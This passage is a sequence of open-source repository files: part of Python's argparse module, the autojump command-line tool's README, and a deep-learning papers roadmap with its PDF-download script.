exclusive groups # NOTE: if add_mutually_exclusive_group ever gains title= and # description= then this code will need to be expanded as above for group in container._mutually_exclusive_groups: mutex_group = self.add_mutually_exclusive_group( required=group.required, ) # map the actions to their new mutex group for action in group._group_actions: group_map[action] = mutex_group # add all actions to this container or their group for action in container._actions: group_map.get(action, self)._add_action(action) def _get_positional_kwargs(self, dest, **kwargs): # make sure required is not specified if 'required' in kwargs: msg = _("'required' is an invalid argument for positionals") raise TypeError(msg) # mark positional arguments as required if at least one is # always required if kwargs.get('nargs') not in [OPTIONAL, ZERO_OR_MORE]: kwargs['required'] = True if kwargs.get('nargs') == ZERO_OR_MORE and 'default' not in kwargs: kwargs['required'] = True # return the keyword arguments with no option strings return dict(kwargs, dest=dest, option_strings=[]) def _get_optional_kwargs(self, *args, **kwargs): # determine short and long option strings option_strings = [] long_option_strings = [] for option_string in args: # error on strings that don't start with an appropriate prefix if not option_string[0] in self.prefix_chars: msg = _( 'invalid option string %r: ' 'must start with a character %r', ) tup = option_string, self.prefix_chars raise ValueError(msg % tup) # strings starting with two prefix characters are long options option_strings.append(option_string) if option_string[0] in self.prefix_chars: if len(option_string) > 1: if option_string[1] in self.prefix_chars: long_option_strings.append(option_string) # infer destination, '--foo-bar' -> 'foo_bar' and '-x' -> 'x' dest = kwargs.pop('dest', None) if dest is None: if long_option_strings: dest_option_string = long_option_strings[0] else: dest_option_string = option_strings[0] dest = dest_option_string.lstrip(self.prefix_chars) if not dest: msg = _('dest= is required for options like %r') raise ValueError(msg % option_string) dest = dest.replace('-', '_') # return the updated keyword arguments return dict(kwargs, dest=dest, option_strings=option_strings) def _pop_action_class(self, kwargs, default=None): action = kwargs.pop('action', default) return self._registry_get('action', action, action) def _get_handler(self): # determine function from conflict handler string handler_func_name = '_handle_conflict_%s' % self.conflict_handler try: return getattr(self, handler_func_name) except AttributeError: msg = _('invalid conflict_resolution value: %r') raise ValueError(msg % self.conflict_handler) def _check_conflict(self, action): # find all options that conflict with this option confl_optionals = [] for option_string in action.option_strings: if option_string in self._option_string_actions: confl_optional = self._option_string_actions[option_string] confl_optionals.append((option_string, confl_optional)) # resolve any conflicts if confl_optionals: conflict_handler = self._get_handler() conflict_handler(action, confl_optionals) def _handle_conflict_error(self, action, conflicting_actions): message = _('conflicting option string(s): %s') conflict_string = ', '.join([ option_string for option_string, action in conflicting_actions ]) raise ArgumentError(action, message % conflict_string) def _handle_conflict_resolve(self, action, conflicting_actions): # remove all conflicting options for option_string, action in conflicting_actions: # remove the 
conflicting option action.option_strings.remove(option_string) self._option_string_actions.pop(option_string, None) # if the option now has no option string, remove it from the # container holding it if not action.option_strings: action.container._remove_action(action) class _ArgumentGroup(_ActionsContainer): def __init__(self, container, title=None, description=None, **kwargs): # add any missing keyword arguments by checking the container update = kwargs.setdefault update('conflict_handler', container.conflict_handler) update('prefix_chars', container.prefix_chars) update('argument_default', container.argument_default) super_init = super(_ArgumentGroup, self).__init__ super_init(description=description, **kwargs) # group attributes self.title = title self._group_actions = [] # share most attributes with the container self._registries = container._registries self._actions = container._actions self._option_string_actions = container._option_string_actions self._defaults = container._defaults self._has_negative_number_optionals = \ container._has_negative_number_optionals def _add_action(self, action): action = super(_ArgumentGroup, self)._add_action(action) self._group_actions.append(action) return action def _remove_action(self, action): super(_ArgumentGroup, self)._remove_action(action) self._group_actions.remove(action) class _MutuallyExclusiveGroup(_ArgumentGroup): def __init__(self, container, required=False): super(_MutuallyExclusiveGroup, self).__init__(container) self.required = required self._container = container def _add_action(self, action): if action.required: msg = _('mutually exclusive arguments must be optional') raise ValueError(msg) action = self._container._add_action(action) self._group_actions.append(action) return action def _remove_action(self, action): self._container._remove_action(action) self._group_actions.remove(action) class ArgumentParser(_AttributeHolder, _ActionsContainer): """Object for parsing command line strings into Python objects. Keyword Arguments: - prog -- The name of the program (default: sys.argv[0]) - usage -- A usage message (default: auto-generated from arguments) - description -- A description of what the program does - epilog -- Text following the argument descriptions - parents -- Parsers whose arguments should be copied into this one - formatter_class -- HelpFormatter class for printing help messages - prefix_chars -- Characters that prefix optional arguments - fromfile_prefix_chars -- Characters that prefix files containing additional arguments - argument_default -- The default value for all arguments - conflict_handler -- String indicating how to handle conflicts - add_help -- Add a -h/-help option """ def __init__( self, prog=None, usage=None, description=None, epilog=None, version=None, parents=[], formatter_class=HelpFormatter, prefix_chars='-', fromfile_prefix_chars=None, argument_default=None, conflict_handler='error', add_help=True, ): if version is not None: import warnings warnings.warn( """The "version" argument to ArgumentParser is deprecated. 
""" """Please use """ """"add_argument(..., action='version', version="N", ...)" """ """instead""", DeprecationWarning, ) superinit = super(ArgumentParser, self).__init__ superinit( description=description, prefix_chars=prefix_chars, argument_default=argument_default, conflict_handler=conflict_handler, ) # default setting for prog if prog is None: prog = _os.path.basename(_sys.argv[0]) self.prog = prog self.usage = usage self.epilog = epilog self.version = version self.formatter_class = formatter_class self.fromfile_prefix_chars = fromfile_prefix_chars self.add_help = add_help add_group = self.add_argument_group self._positionals = add_group(_('positional arguments')) self._optionals = add_group(_('optional arguments')) self._subparsers = None # register types def identity(string): return string self.register('type', None, identity) # add help and version arguments if necessary # (using explicit default to override global argument_default) if '-' in prefix_chars: default_prefix = '-' else: default_prefix = prefix_chars[0] if self.add_help: self.add_argument( default_prefix + 'h', default_prefix * 2 + 'help', action='help', default=SUPPRESS, help=_('show this help message and exit'), ) if self.version: self.add_argument( default_prefix + 'v', default_prefix * 2 + 'version', action='version', default=SUPPRESS, version=self.version, help=_("show program's version number and exit"), ) # add parent arguments and defaults for parent in parents: self._add_container_actions(parent) try: defaults = parent._defaults except AttributeError: pass else: self._defaults.update(defaults) # ======================= # Pretty __repr__ methods # ======================= def _get_kwargs(self): names = [ 'prog', 'usage', 'description', 'version', 'formatter_class', 'conflict_handler', 'add_help', ] return [(name, getattr(self, name)) for name in names] # ================================== # Optional/Positional adding methods # ================================== def add_subparsers(self, **kwargs): if self._subparsers is not None: self.error(_('cannot have multiple subparser arguments')) # add the parser class to the arguments if it's not present kwargs.setdefault('parser_class', type(self)) if 'title' in kwargs or 'description' in kwargs: title = _(kwargs.pop('title', 'subcommands')) description = _(kwargs.pop('description', None)) self._subparsers = self.add_argument_group(title, description) else: self._subparsers = self._positionals # prog defaults to the usage message of this parser, skipping # optional arguments and with no "usage:" prefix if kwargs.get('prog') is None: formatter = self._get_formatter() positionals = self._get_positional_actions() groups = self._mutually_exclusive_groups formatter.add_usage(self.usage, positionals, groups, '') kwargs['prog'] = formatter.format_help().strip() # create the parsers action and add it to the positionals list parsers_class = self._pop_action_class(kwargs, 'parsers') action = parsers_class(option_strings=[], **kwargs) self._subparsers._add_action(action) # return the created parsers action return action def _add_action(self, action): if action.option_strings: self._optionals._add_action(action) else: self._positionals._add_action(action) return action def _get_optional_actions(self): return [ action for action in self._actions if action.option_strings ] def _get_positional_actions(self): return [ action for action in self._actions if not action.option_strings ] # ===================================== # Command line argument parsing methods # 
===================================== def parse_args(self, args=None, namespace=None): args, argv = self.parse_known_args(args, namespace) if argv: msg = _('unrecognized arguments: %s') self.error(msg % ' '.join(argv)) return args def parse_known_args(self, args=None, namespace=None): # args default to the system args if args is None: args = _sys.argv[1:] # default Namespace built from parser defaults if namespace is None: namespace = Namespace() # add any action defaults that aren't present for action in self._actions: if action.dest is not SUPPRESS: if not hasattr(namespace, action.dest): if action.default is not SUPPRESS: default = action.default if isinstance(action.default, basestring): default = self._get_value(action, default) setattr(namespace, action.dest, default) # add any parser defaults that aren't present for dest in self._defaults: if not hasattr(namespace, dest): setattr(namespace, dest, self._defaults[dest]) # parse the arguments and exit if there are any errors try: namespace, args = self._parse_known_args(args, namespace) if hasattr(namespace, _UNRECOGNIZED_ARGS_ATTR): args.extend(getattr(namespace, _UNRECOGNIZED_ARGS_ATTR)) delattr(namespace, _UNRECOGNIZED_ARGS_ATTR) return namespace, args except ArgumentError: err = _sys.exc_info()[1] self.error(str(err)) def _parse_known_args(self, arg_strings, namespace): # replace arg strings that are file references if self.fromfile_prefix_chars is not None: arg_strings = self._read_args_from_files(arg_strings) # map all mutually exclusive arguments to the other arguments # they can't occur with action_conflicts = {} for mutex_group in self._mutually_exclusive_groups: group_actions = mutex_group._group_actions for i, mutex_action in enumerate(mutex_group._group_actions): conflicts = action_conflicts.setdefault(mutex_action, []) conflicts.extend(group_actions[:i]) conflicts.extend(group_actions[i + 1:]) # find all option indices, and determine the arg_string_pattern # which has an 'O' if there is an option at an index, # an 'A' if there is an argument, or a '-' if there is a '--' option_string_indices = {} arg_string_pattern_parts = [] arg_strings_iter = iter(arg_strings) for i, arg_string in enumerate(arg_strings_iter): # all args after -- are non-options if arg_string == '--': arg_string_pattern_parts.append('-') for arg_string in arg_strings_iter: arg_string_pattern_parts.append('A') # otherwise, add the arg to the arg strings # and note the index if it was an option else: option_tuple = self._parse_optional(arg_string) if option_tuple is None: pattern = 'A' else: option_string_indices[i] = option_tuple pattern = 'O' arg_string_pattern_parts.append(pattern) # join the pieces together to form the pattern arg_strings_pattern = ''.join(arg_string_pattern_parts) # converts arg strings to the appropriate and then takes the action seen_actions = set() seen_non_default_actions = set() def take_action(action, argument_strings, option_string=None): seen_actions.add(action) argument_values = self._get_values(action, argument_strings) # error if this argument is not allowed with other previously # seen arguments, assuming that actions that use the default # value don't really count as "present" if argument_values is not action.default: seen_non_default_actions.add(action) for conflict_action in action_conflicts.get(action, []): if conflict_action in seen_non_default_actions: msg = _('not allowed with argument %s') action_name = _get_action_name(conflict_action) raise ArgumentError(action, msg % action_name) # take the action if we didn't 
receive a SUPPRESS value # (e.g. from a default) if argument_values is not SUPPRESS: action(self, namespace, argument_values, option_string) # function to convert arg_strings into an optional action def consume_optional(start_index): # get the optional identified at this index option_tuple = option_string_indices[start_index] action, option_string, explicit_arg = option_tuple # identify additional optionals in the same arg string # (e.g. -xyz is the same as -x -y -z if no args are required) match_argument = self._match_argument action_tuples = [] while True: # if we found no optional action, skip it if action is None: extras.append(arg_strings[start_index]) return start_index + 1 # if there is an explicit argument, try to match the # optional's string arguments to only this if explicit_arg is not None: arg_count = match_argument(action, 'A') # if the action is a single-dash option and takes no # arguments, try to parse more single-dash options out # of the tail of the option string chars = self.prefix_chars if arg_count == 0 and option_string[1] not in chars: action_tuples.append((action, [], option_string)) char = option_string[0] option_string = char + explicit_arg[0] new_explicit_arg = explicit_arg[1:] or None optionals_map = self._option_string_actions if option_string in optionals_map: action = optionals_map[option_string] explicit_arg = new_explicit_arg else: msg = _('ignored explicit argument %r') raise ArgumentError(action, msg % explicit_arg) # if the action expect exactly one argument, we've # successfully matched the option; exit the loop elif arg_count == 1: stop = start_index + 1 args = [explicit_arg] action_tuples.append((action, args, option_string)) break # error if a double-dash option did not use the # explicit argument else: msg = _('ignored explicit argument %r') raise ArgumentError(action, msg % explicit_arg) # if there is no explicit argument, try to match the # optional's string arguments with the following strings # if successful, exit the loop else: start = start_index + 1 selected_patterns = arg_strings_pattern[start:] arg_count = match_argument(action, selected_patterns) stop = start + arg_count args = arg_strings[start:stop] action_tuples.append((action, args, option_string)) break # add the Optional to the list and return the index at which # the Optional's string args stopped assert action_tuples for action, args, option_string in action_tuples: take_action(action, args, option_string) return stop # the list of Positionals left to be parsed; this is modified # by consume_positionals() positionals = self._get_positional_actions() # function to convert arg_strings into positional actions def consume_positionals(start_index): # match as many Positionals as possible match_partial = self._match_arguments_partial selected_pattern = arg_strings_pattern[start_index:] arg_counts = match_partial(positionals, selected_pattern) # slice off the appropriate arg strings for each Positional # and add the Positional and its args to the list for action, arg_count in zip(positionals, arg_counts): args = arg_strings[start_index: start_index + arg_count] start_index += arg_count take_action(action, args) # slice off the Positionals that we just parsed and return the # index at which the Positionals' string args stopped positionals[:] = positionals[len(arg_counts):] return start_index # consume Positionals and Optionals alternately, until we have # passed the last option string extras = [] start_index = 0 if option_string_indices: max_option_string_index = 
max(option_string_indices) else: max_option_string_index = -1 while start_index <= max_option_string_index: # consume any Positionals preceding the next option next_option_string_index = min([ index for index in option_string_indices if index >= start_index ]) if start_index != next_option_string_index: positionals_end_index = consume_positionals(start_index) # only try to parse the next optional if we didn't consume # the option string during the positionals parsing if positionals_end_index > start_index: start_index = positionals_end_index continue else: start_index = positionals_end_index # if we consumed all the positionals we could and we're not # at the index of an option string, there were extra arguments if start_index not in option_string_indices: strings = arg_strings[start_index:next_option_string_index] extras.extend(strings) start_index = next_option_string_index # consume the next optional and any arguments for it start_index = consume_optional(start_index) # consume any positionals following the last Optional stop_index = consume_positionals(start_index) # if we didn't consume all the argument strings, there were extras extras.extend(arg_strings[stop_index:]) # if we didn't use all the Positional objects, there were too few # arg strings supplied. if positionals: self.error(_('too few arguments')) # make sure all required actions were present for action in self._actions: if action.required: if action not in seen_actions: name = _get_action_name(action) self.error(_('argument %s is required') % name) # make sure all required groups had one option present for group in self._mutually_exclusive_groups: if group.required: for action in group._group_actions: if action in seen_non_default_actions: break # if no actions were used, report the error else: names = [ _get_action_name(action) for action in group._group_actions if action.help is not SUPPRESS ] msg = _('one of the arguments %s is required') self.error(msg % ' '.join(names)) # return the updated namespace and the extra arguments return namespace, extras def _read_args_from_files(self, arg_strings): # expand arguments referencing files new_arg_strings = [] for arg_string in arg_strings: # for regular arguments, just add them back into the list if arg_string[0] not in self.fromfile_prefix_chars: new_arg_strings.append(arg_string) # replace arguments referencing files with the file content else: try: args_file = open(arg_string[1:]) try: arg_strings = [] for arg_line in args_file.read().splitlines(): for arg in self.convert_arg_line_to_args(arg_line): arg_strings.append(arg) arg_strings = self._read_args_from_files(arg_strings) new_arg_strings.extend(arg_strings) finally: args_file.close() except IOError: err = _sys.exc_info()[1] self.error(str(err)) # return the modified argument list return new_arg_strings def convert_arg_line_to_args(self, arg_line): return [arg_line] def _match_argument(self, action, arg_strings_pattern): # match the pattern for this action to the arg strings nargs_pattern = self._get_nargs_pattern(action) match = _re.match(nargs_pattern, arg_strings_pattern) # raise an exception if we weren't able to find a match if match is None: nargs_errors = { None: _('expected one argument'), OPTIONAL: _('expected at most one argument'), ONE_OR_MORE: _('expected at least one argument'), } default = _('expected %s argument(s)') % action.nargs msg = nargs_errors.get(action.nargs, default) raise ArgumentError(action, msg) # return the number of arguments matched return len(match.group(1)) def 
_match_arguments_partial(self, actions, arg_strings_pattern): # progressively shorten the actions list by slicing off the # final actions until we find a match result = [] for i in range(len(actions), 0, -1): actions_slice = actions[:i] pattern = ''.join([ self._get_nargs_pattern(action) for action in actions_slice ]) match = _re.match(pattern, arg_strings_pattern) if match is not None: result.extend([len(string) for string in match.groups()]) break # return the list of arg string counts return result def _parse_optional(self, arg_string): # if it's an empty string, it was meant to be a positional if not arg_string: return None # if it doesn't start with a prefix, it was meant to be positional if not arg_string[0] in self.prefix_chars: return None # if the option string is present in the parser, return the action if arg_string in self._option_string_actions: action = self._option_string_actions[arg_string] return action, arg_string, None # if it's just a single character, it was meant to be positional if len(arg_string) == 1: return None # if the option string before the "=" is present, return the action if '=' in arg_string: option_string, explicit_arg = arg_string.split('=', 1) if option_string in self._option_string_actions: action = self._option_string_actions[option_string] return action, option_string, explicit_arg # search through all possible prefixes of the option string # and all actions in the parser for possible interpretations option_tuples = self._get_option_tuples(arg_string) # if multiple actions match, the option string was ambiguous if len(option_tuples) > 1: options = ', '.join( [option_string for action, option_string, explicit_arg in option_tuples], ) tup = arg_string, options self.error(_('ambiguous option: %s could match %s') % tup) # if exactly one action matched, this segmentation is good, # so return the parsed action elif len(option_tuples) == 1: option_tuple, = option_tuples return option_tuple # if it was not found as an option, but it looks like a negative # number, it was meant to be positional # unless there are negative-number-like options if self._negative_number_matcher.match(arg_string): if not self._has_negative_number_optionals: return None # if it contains a space, it was meant to be a positional if ' ' in arg_string: return None # it was meant to be an optional but there is no such option # in this parser (though it might be a valid option in a subparser) return None, arg_string, None def _get_option_tuples(self, option_string): result = [] # option strings starting with two prefix characters are only # split at the '=' chars = self.prefix_chars if option_string[0] in chars and option_string[1] in chars: if '=' in option_string: option_prefix, explicit_arg = option_string.split('=', 1) else: option_prefix = option_string explicit_arg = None for option_string in self._option_string_actions: if option_string.startswith(option_prefix): action = self._option_string_actions[option_string] tup = action, option_string, explicit_arg result.append(tup) # single character options can be concatenated with their arguments # but multiple character options always have to have their argument # separate elif option_string[0] in chars and option_string[1] not in chars: option_prefix = option_string explicit_arg = None short_option_prefix = option_string[:2] short_explicit_arg = option_string[2:] for option_string in self._option_string_actions: if option_string == short_option_prefix: action = self._option_string_actions[option_string] tup = action, option_string, 
short_explicit_arg result.append(tup) elif option_string.startswith(option_prefix): action = self._option_string_actions[option_string] tup = action, option_string, explicit_arg result.append(tup) # shouldn't ever get here else: self.error(_('unexpected option string: %s') % option_string) # return the collected option tuples return result def _get_nargs_pattern(self, action): # in all examples below, we have to allow for '--' args # which are represented as '-' in the pattern nargs = action.nargs # the default (None) is assumed to be a single argument if nargs is None: nargs_pattern = '(-*A-*)' # allow zero or one arguments elif nargs == OPTIONAL: nargs_pattern = '(-*A?-*)' # allow zero or more arguments elif nargs == ZERO_OR_MORE: nargs_pattern = '(-*[A-]*)' # allow one or more arguments elif nargs == ONE_OR_MORE: nargs_pattern = '(-*A[A-]*)' # allow any number of options or arguments elif nargs == REMAINDER: nargs_pattern = '([-AO]*)' # allow one argument followed by any number of options or arguments elif nargs == PARSER: nargs_pattern = '(-*A[-AO]*)' # all others should be integers else: nargs_pattern = '(-*%s-*)' % '-*'.join('A' * nargs) # if this is an optional action, -- is not allowed if action.option_strings: nargs_pattern = nargs_pattern.replace('-*', '') nargs_pattern = nargs_pattern.replace('-', '') # return the pattern return nargs_pattern # ======================== # Value conversion methods # ======================== def _get_values(self, action, arg_strings): # for everything but PARSER args, strip out '--' if action.nargs not in [PARSER, REMAINDER]: arg_strings = [s for s in arg_strings if s != '--'] # optional argument produces a default when not present if not arg_strings and action.nargs == OPTIONAL: if action.option_strings: value = action.const else: value = action.default if isinstance(value, basestring): value = self._get_value(action, value) self._check_value(action, value) # when nargs='*' on a positional, if there were no command-line # args, use the default if it is anything other than None elif ( not arg_strings and action.nargs == ZERO_OR_MORE and not action.option_strings ): if action.default is not None: value = action.default else: value = arg_strings self._check_value(action, value) # single argument or optional argument produces a single value elif len(arg_strings) == 1 and action.nargs in [None, OPTIONAL]: arg_string, = arg_strings value = self._get_value(action, arg_string) self._check_value(action, value) # REMAINDER arguments convert all values, checking none elif action.nargs == REMAINDER: value = [self._get_value(action, v) for v in arg_strings] # PARSER arguments convert all values, but check only the first elif action.nargs == PARSER: value = [self._get_value(action, v) for v in arg_strings] self._check_value(action, value[0]) # all other types of nargs produce a list else: value = [self._get_value(action, v) for v in arg_strings] for v in value: self._check_value(action, v) # return the converted value return value def _get_value(self, action, arg_string): type_func = self._registry_get('type', action.type, action.type) if not _callable(type_func): msg = _('%r is not callable') raise ArgumentError(action, msg % type_func) # convert the value to the appropriate type try: result = type_func(arg_string) # ArgumentTypeErrors indicate errors except ArgumentTypeError: name = getattr(action.type, '__name__', repr(action.type)) msg = str(_sys.exc_info()[1]) raise ArgumentError(action, msg) # TypeErrors or ValueErrors also indicate errors except 
(TypeError, ValueError): name = getattr(action.type, '__name__', repr(action.type)) msg = _('invalid %s value: %r') raise ArgumentError(action, msg % (name, arg_string)) # return the converted value return result def _check_value(self, action, value): # converted value must be one of the choices (if specified) if action.choices is not None and value not in action.choices: tup = value, ', '.join(map(repr, action.choices)) msg = _('invalid choice: %r (choose from %s)') % tup raise ArgumentError(action, msg) # ======================= # Help-formatting methods # ======================= def format_usage(self): formatter = self._get_formatter() formatter.add_usage( self.usage, self._actions, self._mutually_exclusive_groups, ) return formatter.format_help() def format_help(self): formatter = self._get_formatter() # usage formatter.add_usage( self.usage, self._actions, self._mutually_exclusive_groups, ) # description formatter.add_text(self.description) # positionals, optionals and user-defined groups for action_group in self._action_groups: formatter.start_section(action_group.title) formatter.add_text(action_group.description) formatter.add_arguments(action_group._group_actions) formatter.end_section() # epilog formatter.add_text(self.epilog) # determine help from format above return formatter.format_help() def format_version(self): import warnings warnings.warn( 'The format_version method is deprecated -- the "version" ' 'argument to ArgumentParser is no longer supported.', DeprecationWarning, ) formatter = self._get_formatter() formatter.add_text(self.version) return formatter.format_help() def _get_formatter(self): return self.formatter_class(prog=self.prog) # ===================== # Help-printing methods # ===================== def print_usage(self, file=None): if file is None: file = _sys.stdout self._print_message(self.format_usage(), file) def print_help(self, file=None): if file is None: file = _sys.stdout self._print_message(self.format_help(), file) def print_version(self, file=None): import warnings warnings.warn( 'The print_version method is deprecated -- the "version" ' 'argument to ArgumentParser is no longer supported.', DeprecationWarning, ) self._print_message(self.format_version(), file) def _print_message(self, message, file=None): if message: if file is None: file = _sys.stderr file.write(message) # =============== # Exiting methods # =============== def exit(self, status=0, message=None): if message: self._print_message(message, _sys.stderr) _sys.exit(status) def error(self, message): """error(message: string) Prints a usage message incorporating the message to stderr and exits. If you override this in a subclass, it should not return -- it should either exit or raise an exception. """ self.print_usage(_sys.stderr) self.exit(2, _('%s: error: %s\n') % (self.prog, message))
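The option-parsing helpers above (`_parse_optional`, `_get_option_tuples`, `_get_nargs_pattern`) implement the user-visible rules of `argparse`: `--opt=value` is split at the first `=`, an unambiguous prefix of a long option is accepted, an ambiguous prefix is an error, and an argument that looks like a negative number is treated as a positional when no registered option string looks like a negative number. A minimal sketch of those behaviours against the public `argparse` API (illustrative only, not part of the bundled module):

```py
import argparse

parser = argparse.ArgumentParser(prog='demo')
parser.add_argument('--verbose', action='store_true')
parser.add_argument('--value', type=int)
parser.add_argument('number', type=float)

# '=' splitting and negative-number handling: '-2.5' is parsed as the
# positional because no registered option string looks like a negative number.
print(parser.parse_args(['--value=3', '-2.5']))
# Namespace(number=-2.5, value=3, verbose=False)

# '--verb' is an unambiguous prefix of '--verbose', so it is accepted;
# '--v' would match both '--verbose' and '--value' and trigger the
# "ambiguous option" error raised via _get_option_tuples().
print(parser.parse_args(['--verb', '--value', '7', '1.0']))
# Namespace(number=1.0, value=7, verbose=True)
```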
NAME ---- autojump - a faster way to navigate your filesystem DESCRIPTION ----------- autojump is a faster way to navigate your filesystem. It works by maintaining a database of the directories you use the most from the command line. *Directories must be visited first before they can be jumped to.* USAGE ----- `j` is a convenience wrapper function around `autojump`. Any option that can be used with `autojump` can be used with `j` and vice versa. - Jump To A Directory That Contains `foo`: j foo - Jump To A Child Directory: Sometimes it's convenient to jump to a child directory (sub-directory of current directory) rather than typing out the full name. jc bar - Open File Manager To Directories (instead of jumping): Instead of jumping to a directory, you can open a file explorer window (Mac Finder, Windows Explorer, GNOME Nautilus, etc.) to the directory instead. jo music Opening a file manager to a child directory is also supported: jco images - Using Multiple Arguments: Let's assume the following database: 30 /home/user/mail/inbox 10 /home/user/work/inbox `j in` would jump into /home/user/mail/inbox as the higher weighted entry. However you can pass multiple arguments to autojump to prefer a different entry. In the above example, `j w in` would then change directory to /home/user/work/inbox. For more options refer to help: autojump --help INSTALLATION ------------ ### REQUIREMENTS - Python v2.6+ or Python v3.3+ - Supported shells - bash - first class support - zsh - first class support - fish - community supported - tcsh - community supported - clink - community supported - Supported platforms - Linux - first class support - OS X - first class support - Windows - community supported - BSD - community supported - Supported installation methods - source code - first class support - Debian and derivatives - first class support - ArchLinux / Gentoo / openSUSE / RedHat and derivatives - community supported - Homebrew / MacPorts - community supported Due to limited time and resources, only "first class support" items will be maintained by the primary committers. All "community supported" items will be updated based on pull requests submitted by the general public. Please continue opening issues and providing feedback for community supported items since consolidating information helps other users troubleshoot and submit enhancements and fixes. ### MANUAL Grab a copy of autojump: git clone git://github.com/wting/autojump.git Run the installation script and follow on screen instructions. cd autojump ./install.py or ./uninstall.py ### AUTOMATIC #### Linux autojump is included in the following distro repositories, please use relevant package management utilities to install (e.g. apt-get, yum, pacman, etc): - Debian, Ubuntu, Linux Mint All Debian-derived distros require manual activation for policy reasons, please see `/usr/share/doc/autojump/README.Debian`. - RedHat, Fedora, CentOS Install `autojump-zsh` for zsh, `autojump-fish` for fish, etc. - ArchLinux - Gentoo - Frugalware - Slackware #### OS X Homebrew is the recommended installation method for Mac OS X: brew install autojump MacPorts is also available: port install autojump Windows ------- Windows support is enabled by [clink](https://mridgers.github.io/clink/) which should be installed prior to installing autojump. KNOWN ISSUES ------------ - autojump does not support directories that begin with `-`. - For bash users, autojump keeps track of directories by modifying `$PROMPT_COMMAND`. 
Do not overwrite `$PROMPT_COMMAND`:

        export PROMPT_COMMAND="history -a"

    Instead append to the end of the existing \$PROMPT\_COMMAND:

        export PROMPT_COMMAND="${PROMPT_COMMAND:+$PROMPT_COMMAND ;} history -a"

REPORTING BUGS
--------------

For any questions or issues, please visit:

    https://github.com/wting/autojump/issues

AUTHORS
-------

autojump was originally written by Joël Schaerer and is currently maintained by William Ting. More contributors can be found in `AUTHORS`.

COPYRIGHT
---------

Copyright © 2016 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>. This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law.
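The "Using Multiple Arguments" behaviour described in the USAGE section above can be pictured with a short sketch. This is a deliberately simplified illustration (a hypothetical `best_match` helper, not autojump's actual matching code): every argument must occur in the candidate path, and among the matches the highest-weighted entry wins.

```py
# Hypothetical sketch of weighted matching, not autojump's real implementation.
database = {
    '/home/user/mail/inbox': 30,
    '/home/user/work/inbox': 10,
}

def best_match(args, db):
    """Return the highest-weighted path that contains every argument."""
    candidates = [(weight, path) for path, weight in db.items()
                  if all(arg in path for arg in args)]
    return max(candidates)[1] if candidates else None

print(best_match(['in'], database))       # /home/user/mail/inbox  (higher weight)
print(best_match(['w', 'in'], database))  # /home/user/work/inbox
```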
Deep-Learning-Papers-Reading-Roadmap
a994642f82f071926fcb472bcf6cd63e4abba7ab
File: download.py from __future__ import print_function import os import re from six.moves.urllib.error import HTTPError import shutil import argparse import mistune import bs4 as BeautifulSoup import socket import time import requests # encoding=utf8 import sys try: reload(sys) except NameError: pass try: sys.setdefaultencoding('utf8') except AttributeError: pass def download_pdf(link, location, name): try: response = requests.get(link) with open(os.path.join(location, name), 'wb') as f: f.write(response.content) f.close() except HTTPError: print('>>> Error 404: cannot be downloaded!\n') raise except socket.timeout: print(" ".join(("can't download", link, "due to connection timeout!")) ) raise def clean_pdf_link(link): if 'arxiv' in link: link = link.replace('abs', 'pdf') if not(link.endswith('.pdf')): link = '.'.join((link, 'pdf')) print(link) return link def clean_text(text, replacements = {':': '_', ' ': '_', '/': '_', '.': '', '"': ''}): for key, rep in replacements.items(): text = text.replace(key, rep) return text def print_title(title, pattern = "-"): print('\n'.join(("", title, pattern * len(title)))) def get_extension(link): extension = os.path.splitext(link)[1][1:] if extension in ['pdf', 'html']: return extension if 'pdf' in extension: return 'pdf' return 'pdf' def shorten_title(title): m1 = re.search('[[0-9]*]', title) m2 = re.search('".*"', title) if m1: title = m1.group(0) if m2: title = ' '.join((title, m2.group(0))) return title[:50] + ' [...]' if __name__ == '__main__': parser = argparse.ArgumentParser(description = 'Download all the PDF/HTML links into README.md') parser.add_argument('-d', action="store", dest="directory") parser.add_argument('--no-html', action="store_true", dest="nohtml", default = False) parser.add_argument('--overwrite', action="store_true", default = False) results = parser.parse_args() output_directory = 'pdfs' if results.directory is None else results.directory forbidden_extensions = ['html', 'htm'] if results.nohtml else [] if results.overwrite and os.path.exists(output_directory): shutil.rmtree(output_directory) with open('README.md',encoding='utf8') as readme: readme_html = mistune.markdown(readme.read()) readme_soup = BeautifulSoup.BeautifulSoup(readme_html, "html.parser") point = readme_soup.find_all('h1')[1] failures = [] while point is not None: if point.name: if re.search('h[1-2]', point.name): if point.name == 'h1': h1_directory = os.path.join(output_directory, clean_text(point.text)) current_directory = h1_directory elif point.name == 'h2': current_directory = os.path.join(h1_directory, clean_text(point.text)) if not os.path.exists(current_directory): os.makedirs(current_directory) print_title(point.text) if point.name == 'p': link = point.find('a') if link is not None: link = clean_pdf_link(link.attrs['href']) ext = get_extension(link) print(ext) if not ext in forbidden_extensions: print(shorten_title(point.text) + ' (' + link + ')') try: name = clean_text(point.text.split('[' + ext + ']')[0]) fullname = '.'.join((name, ext)) if not os.path.exists('/'.join((current_directory, fullname)) ): download_pdf(link, current_directory, '.'.join((name, ext))) except KeyboardInterrupt: try: print("Press Ctrl-C in 1 second to quit") time.sleep(1) except KeyboardInterrupt: print("Cancelling..") break except: failures.append(point.text) point = point.next_sibling print('Done!') if failures: print('Some downloads have failed:') for fail in failures: print('> ' + fail)
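As a quick illustration of what `clean_pdf_link()` above does to the arXiv links found in the roadmap below (a standalone restatement of its logic, not an import of `download.py`): `abs` pages are rewritten to direct `pdf` links and a missing `.pdf` suffix is appended. The script itself is typically invoked from the repository root, e.g. `python download.py -d pdfs --no-html`, per the argparse options defined above.

```py
# Standalone restatement of the clean_pdf_link() logic above, for one sample link.
link = 'http://arxiv.org/abs/1512.03385'
if 'arxiv' in link:
    link = link.replace('abs', 'pdf')
    if not link.endswith('.pdf'):
        link = '.'.join((link, 'pdf'))
print(link)  # http://arxiv.org/pdf/1512.03385.pdf
```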
# Deep Learning Papers Reading Roadmap

>If you are a newcomer to the Deep Learning area, the first question you may have is "Which paper should I start reading from?"

>Here is a reading roadmap of Deep Learning papers!

The roadmap is constructed in accordance with the following four guidelines:

- From outline to detail
- From old to state-of-the-art
- From generic to specific areas
- Focus on state-of-the-art

You will find many papers that are quite new but really worth reading. I will continue adding papers to this roadmap.

---------------------------------------

# 1 Deep Learning History and Basics

## 1.0 Book

